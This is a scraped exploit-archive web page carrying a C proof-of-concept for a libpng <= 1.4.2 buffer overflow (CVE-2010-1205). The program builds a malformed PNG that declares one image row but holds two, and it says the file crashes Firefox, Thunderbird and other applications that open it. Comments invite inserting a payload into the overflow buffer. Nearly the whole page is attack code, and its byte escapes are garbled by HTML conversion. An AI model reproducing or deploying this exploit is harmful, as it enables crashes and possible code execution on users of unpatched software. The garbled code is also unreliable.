Information Security News and Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>libpng &lt;= 1.4.2 Denial of Service Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================
libpng &lt;= 1.4.2 Denial of Service Vulnerability
===============================================

/*
Exploit Title: libpng &lt;= 1.4.2 DoS
Date: July 20, 2010
Author: kripthor
Software Link: http://www.libpng.org/pub/png/libpng.html
Version: all products that use libpng &lt;= 1.4.2
Tested on: Windows XP Pro SP3 Eng / Ubuntu 10
CVE : CVE-2010-1205
Notes: This crashes Firefox &lt;= 3.6.6 and Thunderbird &lt;= 3.0.4
inkscape, png2html, etc…
ALL products that use libpng &lt;= 1.4.2 maybe vulnerable.

References:
libpng.org
RFC-2083
RFC 1950
RFC 1951
*/

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
#include &lt;arpa/inet.h&gt;
#include &lt;assert.h&gt;
#include &lt;unistd.h&gt;

#define BASE 65521L /* largest prime smaller than 65536 */

/*
Update a running Adler-32 checksum with the bytes buf[0..len-1]
and return the updated checksum. The Adler-32 checksum should be
initialized to 1.

Usage example:

unsigned long adler = 1L;

while (read_buffer(buffer, length) != EOF) {
adler = update_adler32(adler, buffer, length);
}
if (adler != original_adler) error();
*/
unsigned long update_adler32(unsigned long adler, unsigned char *buf, int len)
{
unsigned long s1 = adler &amp; 0xffff;
unsigned long s2 = (adler &gt;&gt; 16) &amp; 0xffff;
int n;

for (n = 0; n &lt; len; n++) {
s1 = (s1 + buf[n]) % BASE;
s2 = (s2 + s1) % BASE;
}
return (s2 &lt;&lt; 16) + s1;
}

/* Return the adler32 of the bytes buf[0..len-1] */

unsigned long adler32(unsigned char *buf, int len)
{
return update_adler32(1L, buf, len);
}

/* CRC based on implementation by Finn Yannick Jacobs */
/* crc_tab[] — this crcTable is being build by chksum_crc32GenTab().
* so make sure, you call it before using the other
* functions!
*/
u_int32_t crc_tab[256];

/* chksum_crc() — to a given block, this one calculates the
* crc32-checksum until the length is
* reached. the crc32-checksum will be
* the result.
*/
unsigned int chksum_crc32 (char *block, unsigned int length)
{
register unsigned long crc;
unsigned long i;

crc = 0xFFFFFFFF;
for (i = 0; i &lt; length; i++)
{
crc = ((crc &gt;&gt; &amp; 0×00FFFFFF) ^ crc_tab[(crc ^ *block++) &amp; 0xFF];
}
return (crc ^ 0xFFFFFFFF);
}

/* chksum_crc32gentab() — to a global crc_tab[256], this one will
* calculate the crcTable for crc32-checksums.
* it is generated to the polynom [..]
*/

void chksum_crc32gentab ()
{
unsigned long crc, poly;
int i, j;

poly = 0xEDB88320L;
for (i = 0; i &lt; 256; i++)
{
crc = i;
for (j = 8; j &gt; 0; j–)
{
if (crc &amp; 1)
{
crc = (crc &gt;&gt; 1) ^ poly;
}
else
{
crc &gt;&gt;= 1;
}
}
crc_tab[i] = crc;
}
}

int main(void) {

chksum_crc32gentab();

// VALID PNG FILE BEGINS

//PNG FILE SIGNATURE
char PNG_SIGN[] = &quot;x89×50x4ex47×0dx0ax1ax0a&quot;;
// IHDR CHUNCK size
char PNG_IHDR_SIZE[] = &quot;x00×00x00×0d&quot;;
// IHDR CHUNCK IHDR string id
char PNG_IHDR[] = &quot;IHDR&quot;;
// IMAGE WIDTH 4 bytes
char PNG_IHDR_WIDTH[] = &quot;x00×00x00×10&quot;;
// IMAGE HEIGTH 4 bytes
char PNG_IHDR_HEIGHT[] = &quot;x00×00x00×02&quot;;
// IMAGE ATTRS 5 bytes: bit depth, color type, compression, filter and interlace method
char PNG_IHDR_ATTRS[] = &quot;x08×06x00×00x00&quot;;
// CRC32 excluding size!
//char PNG_IHDR_CRC32[] = &quot;x51xedx5cxf1&quot;;

// OTHER FIELDS sRGB, pHYs, tIME
char PNG_OTHER_FIELDS[] =&quot;x00×00x00×01x73×52x47×42x00xaexcex1cxe9×00x00×00x09×70x48×59x73×00x00×0bx13×00x00×0bx13×01x00×9ax9cx18×00x00×00x07×74x49×4dx45×07xdax07×0cx14×1cx38×52xddx18×2e&quot;;

// IDAT CHUNCK SIZE
char PNG_IDAT_SIZE[] = &quot;x00×00x00×8d&quot;;
// IDAT CHUNCK IDAT string id
char PNG_IDAT[] = &quot;IDAT&quot;;
// data in zlib format!
char PNG_IDAT_DATA_ZLIB_HEADER[] = &quot;x08×1dx01×82x00×7dxff&quot;;
// zlib content, size in RGBa with no compression = height*width*4;
//char PNG_IDAT_DATA_ZLIB_CONTENT[] = &quot;x01xffx00×00xffx01xffx30×00x00×01xcfx00×2bx2ax2bx00×11x12×11x00×10x10×11x00×11x11×11x00×11x11×11x00×11x11×12x00×11x11×10x00×11x11×10x00×11x11×12x00×10x11×11x00×11x11×11x00×12x11×10x00×10x10×11x00×02x00×00x00×00x00×00x00×00x00×00x00×00x00×01x01×00xffxffx00×00x00×01x00×00x01×00x00×00x00×00x00×00x00×00xffx00×00x00×00x00×00x00×01x00xffx00×00x00×01x00xffx00×01x00×00x00xffxffx01×00x01×01x00×00&quot;;
// adler32 of zlib_content
//char PNG_IDAT_DATA_ZLIB_ADLER32[] = &quot;xb1xa6×0dxe5&quot;;

// CRC32 excluding size!
//char PNG_IDAT_CRC32[] = &quot;x88×3bxb3xfe&quot;;

// IEND CHUNCK
char PNG_IEND_CHUNCK[] = &quot;x00×00x00×00x49×45x4ex44xaex42×60x82&quot;;

// VALID PNG FILE ENDS

//———————————————————————————–
//———————————
// TRIGGER OVERFLOW.
// WE ARE GOING TO CREATE A PNG WITH 2 ROWS AND MARK IT AS HAVING 1 ROW
// OUR BUFFER CAN BE width*height*4+height in size

// CHOOSE A WIDTH (crashes occur around 512 width)
int WIDTH = 700;
unsigned int w = htonl(WIDTH);
memcpy(PNG_IHDR_WIDTH,&amp;w,4);

int HEIGHT = 2;
// TRIGGER OVERFLOW REPORT HEIGHT-1 IN THE HEADER
unsigned int h = htonl(HEIGHT-1);
memcpy(PNG_IHDR_HEIGHT,&amp;h,4);

// USE THIS BUFFER FOR YOUR PWNSAUCE ?
int idat_zlib_data_size = WIDTH*HEIGHT*4+HEIGHT;
unsigned char *buf = malloc(idat_zlib_data_size);
memset(buf,0×41,idat_zlib_data_size);
// USE THIS BUFFER FOR YOUR PWNSAUCE ?

// FIX ZLIB HEADERS IN THE IDAT BLOCK
short int zblock_size = (short int) idat_zlib_data_size;
short int zblock_size_2c = -zblock_size-1;
memcpy(PNG_IDAT_DATA_ZLIB_HEADER+3,&amp;zblock_size,2);
memcpy(PNG_IDAT_DATA_ZLIB_HEADER+5,&amp;zblock_size_2c,2);

unsigned int idat_new_size = htonl(idat_zlib_data_size+11);
memcpy(PNG_IDAT_SIZE,&amp;idat_new_size,4);

//———————————
//———————————————————————————–

FILE * f;

f = fopen ( &quot;xploit.png&quot; , &quot;wb&quot; );
fwrite (PNG_SIGN , 1 , sizeof(PNG_SIGN)-1 , f );
fwrite (PNG_IHDR_SIZE , 1 , sizeof(PNG_IHDR_SIZE)-1 , f );
fwrite (PNG_IHDR , 1 , sizeof(PNG_IHDR)-1 , f );
fwrite (PNG_IHDR_WIDTH , 1 , sizeof(PNG_IHDR_WIDTH)-1 , f );
fwrite (PNG_IHDR_HEIGHT , 1 , sizeof(PNG_IHDR_HEIGHT)-1 , f );
fwrite (PNG_IHDR_ATTRS , 1 , sizeof(PNG_IHDR_ATTRS)-1 , f );

//fwrite (PNG_IHDR_CRC32 , 1 , sizeof(PNG_IHDR_CRC32)-1 , f );
//CALCULATE NEW CRC
int ihdr_data_size = sizeof(PNG_IHDR)-1+sizeof(PNG_IHDR_WIDTH)-1+sizeof(PNG_IHDR_HEIGHT)-1+sizeof(PNG_IHDR_ATTRS)-1;
char* ihdr_data = malloc(ihdr_data_size);
memcpy(ihdr_data,PNG_IHDR,sizeof(PNG_IHDR)-1);
memcpy(ihdr_data+sizeof(PNG_IHDR)-1,PNG_IHDR_WIDTH,sizeof(PNG_IHDR_WIDTH)-1);
memcpy(ihdr_data+sizeof(PNG_IHDR)-1+sizeof(PNG_IHDR_WIDTH)-1,PNG_IHDR_HEIGHT,sizeof(PNG_IHDR_HEIGHT)-1);
memcpy(ihdr_data+sizeof(PNG_IHDR)-1+sizeof(PNG_IHDR_WIDTH)-1+sizeof(PNG_IHDR_HEIGHT)-1,PNG_IHDR_ATTRS,sizeof(PNG_IHDR_ATTRS)-1);
unsigned int crc32_ihdr = htonl(chksum_crc32(ihdr_data,ihdr_data_size));
fwrite ( &amp;crc32_ihdr, 1 , 4 , f );

fwrite (PNG_OTHER_FIELDS , 1 , sizeof(PNG_OTHER_FIELDS)-1 , f );

fwrite (PNG_IDAT_SIZE , 1 , sizeof(PNG_IDAT_SIZE)-1 , f );
fwrite (PNG_IDAT , 1 , sizeof(PNG_IDAT)-1 , f );
fwrite (PNG_IDAT_DATA_ZLIB_HEADER , 1 , sizeof(PNG_IDAT_DATA_ZLIB_HEADER)-1 , f );
fwrite (buf , 1 ,idat_zlib_data_size,f);

//CALCULATE NEW ADLER-32 FOR ZLIB DATA
unsigned int adler32_zlib_data = htonl(adler32(buf,idat_zlib_data_size));
fwrite ( &amp;adler32_zlib_data, 1 , 4 , f );

//CALCULATE NEW CRC
int idat_data_size = sizeof(PNG_IDAT)-1+sizeof(PNG_IDAT_DATA_ZLIB_HEADER)-1+idat_zlib_data_size+4;
char* idat_data = malloc(idat_data_size);
memcpy(idat_data,PNG_IDAT,sizeof(PNG_IDAT)-1);
memcpy(idat_data+sizeof(PNG_IDAT)-1,PNG_IDAT_DATA_ZLIB_HEADER,sizeof(PNG_IDAT_DATA_ZLIB_HEADER)-1);
memcpy(idat_data+sizeof(PNG_IDAT)-1+sizeof(PNG_IDAT_DATA_ZLIB_HEADER)-1,buf,idat_zlib_data_size);
memcpy(idat_data+sizeof(PNG_IDAT)-1+sizeof(PNG_IDAT_DATA_ZLIB_HEADER)-1+idat_zlib_data_size,&amp;adler32_zlib_data,4);
unsigned int crc32_idat = htonl(chksum_crc32(idat_data,idat_data_size));
fwrite ( &amp;crc32_idat, 1 , 4 , f );

fwrite (PNG_IEND_CHUNCK , 1 , sizeof(PNG_IEND_CHUNCK)-1 , f );
fclose (f);

//OPEN XPLOIT.PNG WITH YOUR FAVORITE BROWSER/IMAGE EDIT APP/ETC

return 0;

}

# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-20]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13424